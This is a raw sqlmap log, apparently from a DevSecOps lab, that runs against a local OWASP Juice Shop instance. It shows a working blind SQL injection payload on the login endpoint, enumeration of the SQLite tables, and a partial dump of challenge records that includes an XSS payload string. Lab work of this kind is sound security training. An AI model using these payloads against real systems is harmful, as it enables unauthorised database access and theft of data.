+ +[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program + +[*] starting @ 11:48:49 /2026-05-08/ + +[?1049h(B[?7h[?1049l [?1l>[11:48:49] [WARNING] using '/home/nodo/DevSecOps/DevSecOps-Intro/labs/lab5/sqlmap' as the output directory +[1/1] URL: +GET http://localhost:3000/rest/user/login +POST data: {"email":"*","password":"test"} +do you want to test this URL? [Y/n/q] +> Y +[11:48:49] [INFO] testing URL 'http://localhost:3000/rest/user/login' +custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y +JSON data found in POST body. Do you want to process it? [Y/n/q] Y +[11:48:49] [INFO] using '/home/nodo/DevSecOps/DevSecOps-Intro/labs/lab5/sqlmap/results-05082026_1148am.csv' as the CSV results file in multiple targets mode +[11:48:49] [INFO] testing connection to the target URL +[11:48:49] [INFO] checking if the target is protected by some kind of WAF/IPS +[11:48:49] [INFO] testing if the target URL content is stable +[11:48:50] [INFO] target URL content is stable +[11:48:50] [INFO] testing if (custom) POST parameter 'JSON #1*' is dynamic +[11:48:50] [WARNING] (custom) POST parameter 'JSON #1*' does not appear to be dynamic +[11:48:50] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON #1*' might not be injectable +[11:48:50] [INFO] testing for SQL injection on (custom) POST parameter 'JSON #1*' +[11:48:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' +[11:48:52] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause' +[11:48:54] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)' +[11:48:54] [INFO] (custom) POST parameter 'JSON #1*' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable (with --code=401) +[11:48:54] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)' +[11:48:54] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)' +[11:49:42] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query - comment)' +[11:49:42] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query - comment)' +[11:50:28] [INFO] testing 'SQLite > 2.0 time-based blind - Parameter replace (heavy query)' +[11:50:28] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval +[11:50:28] [INFO] checking if the injection point on (custom) POST parameter 'JSON #1*' is a false positive +(custom) POST parameter 'JSON #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N +sqlmap identified the following injection point(s) with a total of 231 HTTP(s) requests: +--- +Parameter: JSON #1* ((custom) POST) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (NOT) + Payload: {"email":"' OR NOT 3202=3202-- Ivzx","password":"test"} +--- +do you want to exploit this SQL injection? [Y/n] Y +[11:50:28] [INFO] testing SQLite +[11:50:29] [INFO] confirming SQLite +[11:50:29] [INFO] actively fingerprinting SQLite +[11:50:29] [INFO] the back-end DBMS is SQLite +back-end DBMS: SQLite +[11:50:29] [INFO] fetching tables for database: 'SQLite_masterdb' +[11:50:29] [INFO] fetching number of tables for database 'SQLite_masterdb' + +[11:50:29] [INFO] retrieved: 21 +[11:50:29] [INFO] retrieving the length of query output + +[11:50:29] [INFO] retrieved: 5 +[11:50:29] [INFO] retrieved: _____ +[11:50:29] [INFO] retrieved: +[11:50:29] [INFO] retrieved: Users +[11:50:30] [INFO] retrieved: Users +[11:50:30] [INFO] retrieving the length of query output + +[11:50:30] [INFO] retrieved: 15 +[11:50:30] [INFO] retrieved: _______________ +[11:50:30] [INFO] retrieved: +[11:50:32] [INFO] retrieved: sqlite_sequence +[11:50:32] [INFO] retrieved: sqlite_sequence +[11:50:32] [INFO] retrieving the length of query output + +[11:50:32] [INFO] retrieved: 9 +[11:50:32] [INFO] retrieved: _________ +[11:50:32] [INFO] retrieved: +[11:50:33] [INFO] retrieved: Addresses +[11:50:33] [INFO] retrieved: Addresses +[11:50:33] [INFO] retrieving the length of query output + +[11:50:33] [INFO] retrieved: 7 +[11:50:33] [INFO] retrieved: _______ +[11:50:33] [INFO] retrieved: +[11:50:34] [INFO] retrieved: Baskets +[11:50:34] [INFO] retrieved: Baskets +[11:50:34] [INFO] retrieving the length of query output + +[11:50:34] [INFO] retrieved: 8 +[11:50:34] [INFO] retrieved: ________ +[11:50:34] [INFO] retrieved: +[11:50:35] [INFO] retrieved: Products +[11:50:35] [INFO] retrieved: Products +[11:50:35] [INFO] retrieving the length of query output + +[11:50:35] [INFO] retrieved: 11 +[11:50:35] [INFO] retrieved: ___________ +[11:50:35] [INFO] retrieved: +[11:50:39] [INFO] retrieved: BasketItems +[11:50:39] [INFO] retrieved: BasketItems +[11:50:39] [INFO] retrieving the length of query output + +[11:50:39] [INFO] retrieved: 8 +[11:50:39] [INFO] retrieved: ________ +[11:50:39] [INFO] retrieved: +[11:50:40] [INFO] retrieved: Captchas +[11:50:40] [INFO] retrieved: Captchas +[11:50:40] [INFO] retrieving the length of query output + +[11:50:40] [INFO] retrieved: 5 +[11:50:40] [INFO] retrieved: _____ +[11:50:40] [INFO] retrieved: +[11:50:41] [INFO] retrieved: Cards +[11:50:41] [INFO] retrieved: Cards +[11:50:41] [INFO] retrieving the length of query output + +[11:50:41] [INFO] retrieved: 10 +[11:50:41] [INFO] retrieved: __________ +[11:50:41] [INFO] retrieved: +[11:50:42] [INFO] retrieved: Challenges +[11:50:42] [INFO] retrieved: Challenges +[11:50:42] [INFO] retrieving the length of query output + +[11:50:42] [INFO] retrieved: 10 +[11:50:43] [INFO] retrieved: __________ +[11:50:43] [INFO] retrieved: +[11:50:44] [INFO] retrieved: Complaints +[11:50:44] [INFO] retrieved: Complaints +[11:50:44] [INFO] retrieving the length of query output + +[11:50:44] [INFO] retrieved: 10 +[11:50:44] [INFO] retrieved: __________ +[11:50:44] [INFO] retrieved: +[11:50:45] [INFO] retrieved: Deliveries +[11:50:45] [INFO] retrieved: Deliveries +[11:50:45] [INFO] retrieving the length of query output + +[11:50:45] [INFO] retrieved: 9 +[11:50:46] [INFO] retrieved: _________ +[11:50:46] [INFO] retrieved: +[11:50:47] [INFO] retrieved: Feedbacks +[11:50:47] [INFO] retrieved: Feedbacks +[11:50:47] [INFO] retrieving the length of query output + +[11:50:47] [INFO] retrieved: 5 +[11:50:47] [INFO] retrieved: _____ +[11:50:47] [INFO] retrieved: +[11:50:47] [INFO] retrieved: Hints +[11:50:47] [INFO] retrieved: Hints +[11:50:47] [INFO] retrieving the length of query output + +[11:50:47] [INFO] retrieved: 13 +[11:50:48] [INFO] retrieved: _____________ +[11:50:48] [INFO] retrieved: +[11:50:49] [INFO] retrieved: ImageCaptchas +[11:50:49] [INFO] retrieved: ImageCaptchas +[11:50:49] [INFO] retrieving the length of query output + +[11:50:49] [INFO] retrieved: 8 +[11:50:49] [INFO] retrieved: ________ +[11:50:49] [INFO] retrieved: +[11:50:50] [INFO] retrieved: Memories +[11:50:50] [INFO] retrieved: Memories +[11:50:50] [INFO] retrieving the length of query output + +[11:50:50] [INFO] retrieved: 15 +[11:50:50] [INFO] retrieved: _______________ +[11:50:50] [INFO] retrieved: +[11:50:52] [INFO] retrieved: PrivacyRequests +[11:50:52] [INFO] retrieved: PrivacyRequests +[11:50:52] [INFO] retrieving the length of query output + +[11:50:52] [INFO] retrieved: 10 +[11:50:52] [INFO] retrieved: __________ +[11:50:52] [INFO] retrieved: +[11:50:53] [INFO] retrieved: Quantities +[11:50:54] [INFO] retrieved: Quantities +[11:50:54] [INFO] retrieving the length of query output + +[11:50:54] [INFO] retrieved: 8 +[11:50:54] [INFO] retrieved: ________ +[11:50:54] [INFO] retrieved: +[11:50:55] [INFO] retrieved: Recycles +[11:50:55] [INFO] retrieved: Recycles +[11:50:55] [INFO] retrieving the length of query output + +[11:50:55] [INFO] retrieved: 17 +[11:50:55] [INFO] retrieved: _________________ +[11:50:55] [INFO] retrieved: +[11:50:57] [INFO] retrieved: SecurityQuestions +[11:50:57] [INFO] retrieved: SecurityQuestions +[11:50:57] [INFO] retrieving the length of query output + +[11:50:57] [INFO] retrieved: 15 +[11:50:57] [INFO] retrieved: _______________ +[11:50:57] [INFO] retrieved: +[11:50:59] [INFO] retrieved: SecurityAnswers +[11:50:59] [INFO] retrieved: SecurityAnswers +[11:50:59] [INFO] retrieving the length of query output + +[11:50:59] [INFO] retrieved: 7 +[11:50:59] [INFO] retrieved: _______ +[11:50:59] [INFO] retrieved: +[11:51:00] [INFO] retrieved: Wallets +[11:51:00] [INFO] retrieved: Wallets +[11:51:00] [INFO] retrieving the length of query output + +[11:51:00] [INFO] retrieved: 425 +[11:51:00] [INFO] retrieved: __________________________________ +[11:51:00] [INFO] retrieved: +[11:51:54] [INFO] retrieved: ..L, `updatedAt` DATETIME NOT NULL) +[11:51:54] [INFO] retrieved: CREATE TABLE `Challenges` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `key` TEXT, `name` VARCHAR(255), `category` VARCHAR(255), `tags` VARCHAR(255), `description` VARCHAR(255), `difficulty` INTEGER, `mitigationUrl` VARCHAR(255), `solved` TINYINT(1), `disabledEnv` VARCHAR(255), `tutorialOrder` NUMBER, `codingChallengeStatus` NUMBER, `hasCodingChallenge` TINYINT(1), `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL) +[11:51:54] [INFO] fetching entries for table 'Challenges' +[11:51:54] [INFO] fetching number of entries for table 'Challenges' in database 'SQLite_masterdb' + +[11:51:54] [INFO] retrieved: 110 +[11:51:54] [INFO] retrieving the length of query output + +[11:51:54] [INFO] retrieved: 3 +[11:51:54] [INFO] retrieved: ___ +[11:51:54] [INFO] retrieved: +[11:51:55] [INFO] retrieved: XSS +[11:51:55] [INFO] retrieved: XSS +[11:51:55] [INFO] retrieving the length of query output + +[11:51:55] [INFO] retrieved: 1 + +[11:51:55] [INFO] retrieved: 0 +[11:51:55] [INFO] retrieving the length of query output + +[11:51:55] [INFO] retrieved: 30 +[11:51:55] [INFO] retrieved: ______________________________ +[11:51:55] [INFO] retrieved: +[11:51:59] [INFO] retrieved: 2026-05-08 08:29:59.464 +00:00 +[11:51:59] [INFO] retrieved: 2026-05-08 08:29:59.464 +00:00 +[11:51:59] [INFO] retrieving the length of query output + +[11:51:59] [INFO] retrieved: 224 +[11:51:59] [INFO] retrieved: __________________________________ +[11:51:59] [INFO] retrieved: +[11:52:28] [INFO] retrieved: ..harmful on Docker!) +[11:52:28] [INFO] retrieved: Perform a persisted XSS attack with <iframe src="javascript:alert(`xss`)"> without using the frontend application at all. (This challenge is potentially harmful on Docker!) +[11:52:28] [INFO] retrieving the length of query output + +[11:52:28] [INFO] retrieved: 1 + +[11:52:28] [INFO] retrieved: 3 +[11:52:28] [INFO] retrieving the length of query output + +[11:52:28] [INFO] retrieved: 6 +[11:52:28] [INFO] retrieved: ______ +[11:52:28] [INFO] retrieved: +[11:52:29] [INFO] retrieved: Docker +[11:52:29] [INFO] retrieved: Docker +[11:52:29] [INFO] retrieving the length of query output + +[11:52:29] [INFO] retrieved: 1 + +[11:52:29] [INFO] retrieved: 1 +[11:52:29] [INFO] retrieving the length of query output + +[11:52:29] [INFO] retrieved: 1 + +[11:52:29] [INFO] retrieved: 1 +[11:52:29] [INFO] retrieving the length of query output + +[11:52:29] [INFO] retrieved: 19 +[11:52:30] [INFO] retrieved: ___________________ +[11:52:30] [INFO] retrieved: +[11:52:32] [INFO] retrieved: restfulXssChallenge +[11:52:38] [INFO] retrieved: restfulXssChallenge +[11:52:38] [INFO] retrieving the length of query output + +[11:52:38] [INFO] retrieved: 95 +[11:52:38] [INFO] retrieved: __________________________________ +[11:52:38] [INFO] retrieved: +[11:52:48] [INFO] retrieved: ..pting_Prevention_Cheat_Sheet.html +[11:52:48] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html +[11:52:48] [INFO] retrieving the length of query output + +[11:52:48] [INFO] retrieved: 12 +[11:52:48] [INFO] retrieved: ____________ +[11:52:48] [INFO] retrieved: +[11:52:50] [INFO] retrieved: API-only XSS +[11:52:50] [INFO] retrieved: API-only XSS +[11:52:50] [INFO] retrieving the length of query output + +[11:52:50] [INFO] retrieved: 1 + +[11:52:50] [INFO] retrieved: 0 +[11:52:50] [INFO] retrieving the length of query output + +[11:52:50] [INFO] retrieved: 33 +[11:52:50] [INFO] retrieved: _________________________________ +[11:52:50] [INFO] retrieved: +[11:52:54] [INFO] retrieved: Danger Zone,With Coding Challenge +[11:52:54] [INFO] retrieved: Danger Zone,With Coding Challenge +[11:52:54] [INFO] retrieving the length of query output + +[11:52:54] [INFO] retrieved: + +[11:52:54] [INFO] retrieved: +[11:52:54] [INFO] retrieving the length of query output + +[11:52:54] [INFO] retrieved: 30 +[11:52:54] [INFO] retrieved: ______________________________ +[11:52:54] [INFO] retrieved: +[11:53:00] [INFO] retrieved: 2026-05-08 08:29:59.464 +00:00 +[11:53:00] [INFO] retrieved: 2026-05-08 08:29:59.464 +00:00 +[11:53:00] [INFO] retrieving the length of query output + +[11:53:00] [INFO] retrieved: 23 +[11:53:01] [INFO] retrieved: _______________________ +[11:53:01] [INFO] retrieved: +[11:53:03] [INFO] retrieved: Sensitive Data Exposure +[11:53:03] [INFO] retrieved: Sensitive Data Exposure +[11:53:03] [INFO] retrieving the length of query output + +[11:53:03] [INFO] retrieved: 1 + +[11:53:03] [INFO] retrieved: 0 +[11:53:03] [INFO] retrieving the length of query output + +[11:53:03] [INFO] retrieved: 30 +[11:53:03] [INFO] retrieved: ______________________________ +[11:53:03] [INFO] retrieved: +[11:53:07] [INFO] retrieved: 2026-05-08 08:29:59.464 +00:00 +[11:53:07] [INFO] retrieved: 2026-05-08 08:29:59.464 +00:00 +[11:53:07] [INFO] retrieving the length of query output + +[11:53:07] [INFO] retrieved: 49 +[11:53:07] [INFO] retrieved: __________________________________ +[11:53:07] [INFO] retrieved: +[11:53:12] [INFO] retrieved: ..ny access log file of the server. +[11:53:12] [INFO] retrieved: Gain access to any access log file of the server. +[11:53:12] [INFO] retrieving the length of query output + +[11:53:12] [INFO] retrieved: 1 + +[11:53:12] [INFO] retrieved: 4 +[11:53:12] [INFO] retrieving the length of query output + +[11:53:12] [INFO] retrieved: + +[11:53:12] [INFO] retrieved: +[11:53:13] [INFO] retrieving the length of query output + +[11:53:13] [INFO] retrieved: 1 + +[11:53:13] [INFO] retrieved: 1 +[11:53:13] [INFO] retrieving the length of query output + +[11:53:13] [INFO] retrieved: 1 + +[11:53:13] [INFO] retrieved: 2 +[11:53:13] [INFO] retrieving the length of query output + +[11:53:13] [INFO] retrieved: 28 +[11:53:13] [INFO] retrieved: ____________________________ +[11:53:13] [INFO] retrieved: +[11:53:16] [INFO] retrieved: accessLogDisclosureChallenge +[11:53:16] [INFO] retrieved: accessLogDisclosureChallenge +[11:53:16] [INFO] retrieving the length of query output + +[11:53:16] [INFO] retrieved: 71 +[11:53:17] [INFO] retrieved: __________________________________ +[11:53:17] [INFO] retrieved: +[11:53:24] [INFO] retrieved: ..atsheets/Logging_Cheat_Sheet.html +[11:53:24] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html +[11:53:24] [INFO] retrieving the length of query output + +[11:53:24] [INFO] retrieved: 10 +[11:53:24] [INFO] retrieved: __________ +[11:53:24] [INFO] retrieved: +[11:53:25] [INFO] retrieved: Access Log +[11:53:25] [INFO] retrieved: Access Log +[11:53:25] [INFO] retrieving the length of query output + +[11:53:25] [INFO] retrieved: 1 + +[11:53:25] [INFO] retrieved: 0 +[11:53:25] [INFO] retrieving the length of query output + +[11:53:25] [INFO] retrieved: 21 +[11:53:25] [INFO] retrieved: _____________________ +[11:53:25] [INFO] retrieved: +[11:53:27] [INFO] retrieved: With Coding Challenge +[11:53:27] [INFO] retrieved: With Coding Challenge +[11:53:27] [INFO] retrieving the length of query output + +[11:53:27] [INFO] retrieved: + +[11:53:27] [INFO] retrieved: +[11:53:28] [INFO] retrieving the length of query output + +[11:53:28] [INFO] retrieved: 30 +[11:53:28] [INFO] retrieved: ______________________________ +[11:53:28] [INFO] retrieved: +[11:53:31] [INFO] retrieved: 2026-05-08 08:29:59.464 +00:00 +[11:53:31] [INFO] retrieved: 2026-05-08 08:29:59.464 +00:00 +[11:53:31] [INFO] retrieving the length of query output + +[11:53:31] [INFO] retrieved: 25 +[11:53:34] [INFO] retrieved: _________________________ +[11:53:34] [INFO] retrieved: +[11:53:37] [INFO] retrieved: Improper Input Validation +[11:53:37] [INFO] retrieved: Improper Input Validation +[11:53:37] [INFO] retrieving the length of query output + +[11:53:37] [INFO] retrieved: 1 + +[11:53:37] [INFO] retrieved: 0 +[11:53:37] [INFO] retrieving the length of query output + +[11:53:37] [INFO] retrieved: 30 +[11:53:37] [INFO] retrieved: ______________________________ +[11:53:37] [INFO] retrieved: +[11:53:41] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:53:41] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:53:41] [INFO] retrieving the length of query output + +[11:53:41] [INFO] retrieved: 49 +[11:53:41] [INFO] retrieved: __________________________________ +[11:53:41] [INFO] retrieved: +[11:53:46] [INFO] retrieved: ..er with administrator privileges. +[11:53:46] [INFO] retrieved: Register as a user with administrator privileges. +[11:53:46] [INFO] retrieving the length of query output + +[11:53:46] [INFO] retrieved: 1 + +[11:53:46] [INFO] retrieved: 3 +[11:53:46] [INFO] retrieving the length of query output + +[11:53:46] [INFO] retrieved: + +[11:53:46] [INFO] retrieved: +[11:53:47] [INFO] retrieving the length of query output + +[11:53:47] [INFO] retrieved: 1 + +[11:53:47] [INFO] retrieved: 1 +[11:53:47] [INFO] retrieving the length of query output + +[11:53:47] [INFO] retrieved: 1 + +[11:53:47] [INFO] retrieved: 3 +[11:53:47] [INFO] retrieving the length of query output + +[11:53:47] [INFO] retrieved: 22 +[11:53:47] [INFO] retrieved: ______________________ +[11:53:47] [INFO] retrieved: +[11:53:49] [INFO] retrieved: registerAdminChallenge +[11:53:50] [INFO] retrieved: registerAdminChallenge +[11:53:50] [INFO] retrieving the length of query output + +[11:53:50] [INFO] retrieved: 79 +[11:53:50] [INFO] retrieved: __________________________________ +[11:53:50] [INFO] retrieved: +[11:53:58] [INFO] retrieved: ../Mass_Assignment_Cheat_Sheet.html +[11:53:58] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html +[11:53:58] [INFO] retrieving the length of query output + +[11:53:58] [INFO] retrieved: 18 +[11:53:58] [INFO] retrieved: __________________ +[11:53:58] [INFO] retrieved: +[11:54:00] [INFO] retrieved: Admin Registration +[11:54:00] [INFO] retrieved: Admin Registration +[11:54:00] [INFO] retrieving the length of query output + +[11:54:00] [INFO] retrieved: 1 + +[11:54:00] [INFO] retrieved: 0 +[11:54:00] [INFO] retrieving the length of query output + +[11:54:00] [INFO] retrieved: 21 +[11:54:00] [INFO] retrieved: _____________________ +[11:54:00] [INFO] retrieved: +[11:54:02] [INFO] retrieved: With Coding Challenge +[11:54:02] [INFO] retrieved: With Coding Challenge +[11:54:02] [INFO] retrieving the length of query output + +[11:54:02] [INFO] retrieved: + +[11:54:02] [INFO] retrieved: +[11:54:03] [INFO] retrieving the length of query output + +[11:54:03] [INFO] retrieved: 30 +[11:54:03] [INFO] retrieved: ______________________________ +[11:54:03] [INFO] retrieved: +[11:54:06] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:54:06] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:54:06] [INFO] retrieving the length of query output + +[11:54:06] [INFO] retrieved: 21 +[11:54:06] [INFO] retrieved: _____________________ +[11:54:06] [INFO] retrieved: +[11:54:11] [INFO] retrieved: Broken Access Control +[11:54:11] [INFO] retrieved: Broken Access Control +[11:54:11] [INFO] retrieving the length of query output + +[11:54:11] [INFO] retrieved: 1 + +[11:54:11] [INFO] retrieved: 0 +[11:54:12] [INFO] retrieving the length of query output + +[11:54:12] [INFO] retrieved: 30 +[11:54:12] [INFO] retrieved: ______________________________ +[11:54:12] [INFO] retrieved: +[11:54:16] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:54:16] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:54:16] [INFO] retrieving the length of query output + +[11:54:16] [INFO] retrieved: 47 +[11:54:16] [INFO] retrieved: __________________________________ +[11:54:16] [INFO] retrieved: +[11:54:21] [INFO] retrieved: ..inistration section of the store. +[11:54:21] [INFO] retrieved: Access the administration section of the store. +[11:54:21] [INFO] retrieving the length of query output + +[11:54:21] [INFO] retrieved: 1 + +[11:54:21] [INFO] retrieved: 2 +[11:54:21] [INFO] retrieving the length of query output + +[11:54:21] [INFO] retrieved: + +[11:54:21] [INFO] retrieved: +[11:54:21] [INFO] retrieving the length of query output + +[11:54:21] [INFO] retrieved: 1 + +[11:54:21] [INFO] retrieved: 1 +[11:54:21] [INFO] retrieving the length of query output + +[11:54:21] [INFO] retrieved: 1 + +[11:54:21] [INFO] retrieved: 4 +[11:54:22] [INFO] retrieving the length of query output + +[11:54:22] [INFO] retrieved: 21 +[11:54:22] [INFO] retrieved: _____________________ +[11:54:22] [INFO] retrieved: +[11:54:24] [INFO] retrieved: adminSectionChallenge +[11:54:24] [INFO] retrieved: adminSectionChallenge +[11:54:24] [INFO] retrieving the length of query output + +[11:54:24] [INFO] retrieved: 77 +[11:54:24] [INFO] retrieved: __________________________________ +[11:54:24] [INFO] retrieved: +[11:54:32] [INFO] retrieved: ..ts/Authorization_Cheat_Sheet.html +[11:54:32] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Authorization_Cheat_Sheet.html +[11:54:32] [INFO] retrieving the length of query output + +[11:54:32] [INFO] retrieved: 13 +[11:54:32] [INFO] retrieved: _____________ +[11:54:32] [INFO] retrieved: +[11:54:33] [INFO] retrieved: Admin Section +[11:54:33] [INFO] retrieved: Admin Section +[11:54:33] [INFO] retrieving the length of query output + +[11:54:33] [INFO] retrieved: 1 + +[11:54:34] [INFO] retrieved: 0 +[11:54:34] [INFO] retrieving the length of query output + +[11:54:34] [INFO] retrieved: 36 +[11:54:34] [INFO] retrieved: __________________________________ +[11:54:34] [INFO] retrieved: +[11:54:37] [INFO] retrieved: ..d for Demos,With Coding Challenge +[11:54:38] [INFO] retrieved: Good for Demos,With Coding Challenge +[11:54:38] [INFO] retrieving the length of query output + +[11:54:38] [INFO] retrieved: 1 + +[11:54:38] [INFO] retrieved: 8 +[11:54:38] [INFO] retrieving the length of query output + +[11:54:38] [INFO] retrieved: 30 +[11:54:38] [INFO] retrieved: ______________________________ +[11:54:38] [INFO] retrieved: +[11:54:42] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:54:45] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:54:45] [INFO] retrieving the length of query output + +[11:54:45] [INFO] retrieved: 21 +[11:54:45] [INFO] retrieved: _____________________ +[11:54:45] [INFO] retrieved: +[11:54:47] [INFO] retrieved: Vulnerable Components +[11:54:47] [INFO] retrieved: Vulnerable Components +[11:54:47] [INFO] retrieving the length of query output + +[11:54:47] [INFO] retrieved: 1 + +[11:54:47] [INFO] retrieved: 0 +[11:54:47] [INFO] retrieving the length of query output + +[11:54:47] [INFO] retrieved: 30 +[11:54:47] [INFO] retrieved: ______________________________ +[11:54:47] [INFO] retrieved: +[11:54:51] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:54:51] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:54:51] [INFO] retrieving the length of query output + +[11:54:51] [INFO] retrieved: 142 +[11:54:51] [INFO] retrieved: __________________________________ +[11:54:51] [INFO] retrieved: +[11:55:06] [INFO] retrieved: ..harmful on Docker!) +[11:55:06] [INFO] retrieved: Overwrite the Legal Information file. (This challenge is potentially harmful on Docker!) +[11:55:06] [INFO] retrieving the length of query output + +[11:55:06] [INFO] retrieved: 1 + +[11:55:06] [INFO] retrieved: 6 +[11:55:06] [INFO] retrieving the length of query output + +[11:55:06] [INFO] retrieved: 6 +[11:55:06] [INFO] retrieved: ______ +[11:55:06] [INFO] retrieved: +[11:55:07] [INFO] retrieved: Docker +[11:55:07] [INFO] retrieved: Docker +[11:55:07] [INFO] retrieving the length of query output + +[11:55:07] [INFO] retrieved: 1 + +[11:55:07] [INFO] retrieved: 0 +[11:55:07] [INFO] retrieving the length of query output + +[11:55:07] [INFO] retrieved: 1 + +[11:55:07] [INFO] retrieved: 5 +[11:55:07] [INFO] retrieving the length of query output + +[11:55:07] [INFO] retrieved: 18 +[11:55:08] [INFO] retrieved: __________________ +[11:55:08] [INFO] retrieved: +[11:55:09] [INFO] retrieved: fileWriteChallenge +[11:55:10] [INFO] retrieved: fileWriteChallenge +[11:55:10] [INFO] retrieving the length of query output + +[11:55:10] [INFO] retrieved: 96 +[11:55:10] [INFO] retrieved: __________________________________ +[11:55:10] [INFO] retrieved: +[11:55:23] [INFO] retrieved: ..dency_Management_Cheat_Sheet.html +[11:55:23] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html +[11:55:23] [INFO] retrieving the length of query output + +[11:55:23] [INFO] retrieved: 20 +[11:55:23] [INFO] retrieved: ____________________ +[11:55:23] [INFO] retrieved: +[11:55:25] [INFO] retrieved: Arbitrary File Write +[11:55:25] [INFO] retrieved: Arbitrary File Write +[11:55:25] [INFO] retrieving the length of query output + +[11:55:25] [INFO] retrieved: 1 + +[11:55:25] [INFO] retrieved: 0 +[11:55:25] [INFO] retrieving the length of query output + +[11:55:25] [INFO] retrieved: 24 +[11:55:26] [INFO] retrieved: ________________________ +[11:55:26] [INFO] retrieved: +[11:55:28] [INFO] retrieved: Danger Zone,Prerequisite +[11:55:28] [INFO] retrieved: Danger Zone,Prerequisite +[11:55:28] [INFO] retrieving the length of query output + +[11:55:28] [INFO] retrieved: + +[11:55:28] [INFO] retrieved: +[11:55:28] [INFO] retrieving the length of query output + +[11:55:28] [INFO] retrieved: 30 +[11:55:29] [INFO] retrieved: ______________________________ +[11:55:29] [INFO] retrieved: +[11:55:32] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:55:32] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:55:32] [INFO] retrieving the length of query output + +[11:55:32] [INFO] retrieved: 21 +[11:55:32] [INFO] retrieved: _____________________ +[11:55:32] [INFO] retrieved: +[11:55:34] [INFO] retrieved: Broken Authentication +[11:55:34] [INFO] retrieved: Broken Authentication +[11:55:34] [INFO] retrieving the length of query output + +[11:55:34] [INFO] retrieved: 1 + +[11:55:35] [INFO] retrieved: 0 +[11:55:35] [INFO] retrieving the length of query output + +[11:55:35] [INFO] retrieved: 30 +[11:55:35] [INFO] retrieved: ______________________________ +[11:55:35] [INFO] retrieved: +[11:55:38] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:55:38] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[11:55:38] [INFO] retrieving the length of query output + +[11:55:38] [INFO] retrieved: 169 +[11:55:38] [INFO] retrieved: __________________________________ +[11:55:38] [INFO] retrieved: +[11:55:59] [INFO] retrieved: ..wer to his security question. +[11:55:59] [INFO] retrieved: Reset the password of Bjoern's OWASP account via the Forgot Password mechanism with the original answer to his security question. +[11:55:59] [INFO] retrieving the length of query output + +[11:55:59] [INFO] retrieved: 1 + +[11:55:59] [INFO] retrieved: 3 +[11:55:59] [INFO] retrieving the length of query output + +[11:55:59] [INFO] retrieved: + +[11:55:59] [INFO] retrieved: +[11:56:00] [INFO] retrieving the length of query output + +[11:56:00] [INFO] retrieved: 1 + +[11:56:00] [INFO] retrieved: 1 +[11:56:00] [INFO] retrieving the length of query output + +[11:56:00] [INFO] retrieved: 1 + +[11:56:00] [INFO] retrieved: 6 +[11:56:00] [INFO] retrieving the length of query output + +[11:56:00] [INFO] retrieved: 33 +[11:56:00] [INFO] retrieved: _________________________________ +[11:56:00] [INFO] retrieved: +[11:56:04] [INFO] retrieved: resetPasswordBjoernOwaspChallenge +[11:56:04] [INFO] retrieved: resetPasswordBjoernOwaspChallenge +[11:56:04] [INFO] retrieving the length of query output + +[11:56:04] [INFO] retrieved: 101 +[11:56:04] [INFO] retrieved: __________________________________ +[11:56:04] [INFO] retrieved: +[11:56:15] [INFO] retrieved: ..curity_Questions_Cheat_Sheet.html +[11:56:15] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html +[11:56:15] [INFO] retrieving the length of query output + +[11:56:15] [INFO] retrieved: 21 +[11:56:15] [INFO] retrieved: _____________________ +[11:56:15] [INFO] retrieved: +[11:56:17] [INFO] retrieved: Bjoern's Favorite Pet +[11:56:17] [INFO] retrieved: Bjoern's Favorite Pet +[11:56:17] [INFO] retrieving the length of query output + +[11:56:17] [INFO] retrieved: 1 + +[11:56:17] [INFO] retrieved: 0 +[11:56:17] [INFO] retrieving the length of query output + +[11:56:17] [INFO] retrieved: 27 +[11:56:18] [INFO] retrieved: ___________________________ +[11:56:18] [INFO] retrieved: +[11:56:20] [INFO] retrieved: OSINT,With Coding Challenge +[11:56:20] [INFO] retrieved: OSINT,With Coding Challenge +[11:56:20] [INFO] retrieving the length of query output + +[11:56:20] [INFO] retrieved: + +[11:56:20] [INFO] retrieved: +[11:56:21] [INFO] retrieving the length of query output + +[11:56:21] [INFO] retrieved: 30 +[11:56:21] [INFO] retrieved: ______________________________ +[11:56:21] [INFO] retrieved: 